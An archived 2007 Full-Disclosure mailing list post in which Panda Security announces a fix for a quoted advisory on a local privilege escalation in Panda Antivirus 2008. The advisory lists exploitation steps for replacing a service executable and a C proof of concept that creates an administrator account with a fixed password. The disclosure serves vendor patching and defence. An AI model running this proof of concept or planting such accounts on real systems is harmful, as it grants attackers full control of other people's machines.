lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <84ECAF53A2F0F045BD9B7FD0FC56A0BD08E8A7EE@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
Date: Wed, 19 Sep 2007 22:58:42 +0200
From: "Panda Security Response" <secure@...dasecurity.com>
To: "Full Disclosure" <full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>
Cc: tarkus@...fp.org, vuldb@...urityfocus.com
Subject: Re: Panda Antivirus 2008 Local Privileg
	Escalation (UPS they did it again)

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Regarding the priviledge escalation report below for Panda Antivirus
2008, there is a fix available here:
http://www.pandasecurity.com/homeusers/support/card?id=41111&idIdioma=
2&ref=PAV08Dev

Users of vulnerable 2007 versions should upgrade to Panda Antivirus
2008 and apply the fix provided.

For future vulnerability reporting to Panda please write specifically
and exclusively to "Panda Security Response"
<secure@...dasecurity.com> instead of generic beta or informational
contact mailboxes.


- ----------------------------------------------
Pedro Bustamante
Senior Research Advisor
Panda Security

email: pedro.bustamante@...dasecurity.com <0xC684A6F9>
vulns: secure@...dasecurity.com <0x70F3FEA0>
phone: (+34) 91-8063700
blog:  http://research.pandasoftware.com 
- ----------------------------------------------







_________________________________________
Security Advisory
_________________________________________


Severity: Medium
Title: Panda Antivirus 2008 Local Privileg Escalation
Date: 02.08.07
Author: tarkus (tarkus (at) tiifp (dot) org)
URL: https://tiifp.org/tarkus
Vendor: Panda (http://www.pandasoftware.com/)
Affected Products: Panda Antivirus 2008
Not Affected Products: - Panda Internetsecurity 2008
- - Panda Antivirus + Firewall 2008

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- -

Description:
- ------------

1. During installation of Panda Antivirus 2008 the permissions for
installation folder %ProgramFiles%\Panda Security\Panda Antivirus
2008by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are
started
under LocalSystem account. There is no protection of service files.
It's
possible for unprivileged user to replace service executable with the
file of his choice to get full access with LocalSystem privileges. Or
to
get privileges or any user (including system administrator) who
logons
to vulnerable host. This can be exploited by:

a. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
b. Copy any application to PAVSRV51.exe
c. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

BTW: Check this from last year
(http://www.securityfocus.com/bid/19891)

POC:
- ----

#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password
\"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators
group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
owner /add", szWinDir );

system( szCmdLine );

return 0;
}

Vendor Response:
- ----------------

[...]
Thank you very much for having reported us this piece of information.
This feedback will allow us to keep improving our products and to
prepare new releases that will fit your actual needs and helps us to
create a better product.
[...]

Disclosure Timeline:
- --------------------

2007.06.07 - Vulnerability found
2007.06.07 - Reported to Vendor (Until Beta)
2007.07.31 - Released by vender
2007.08.02 - Public Disclosure

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBRvGNgo6s6aZw8/6gEQKByQCgkNraFuCwXwqU13zaJfvRroHgKQcAn3mz
lluFlAcVUyeyeuMXqRaiygc5
=8GnR
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ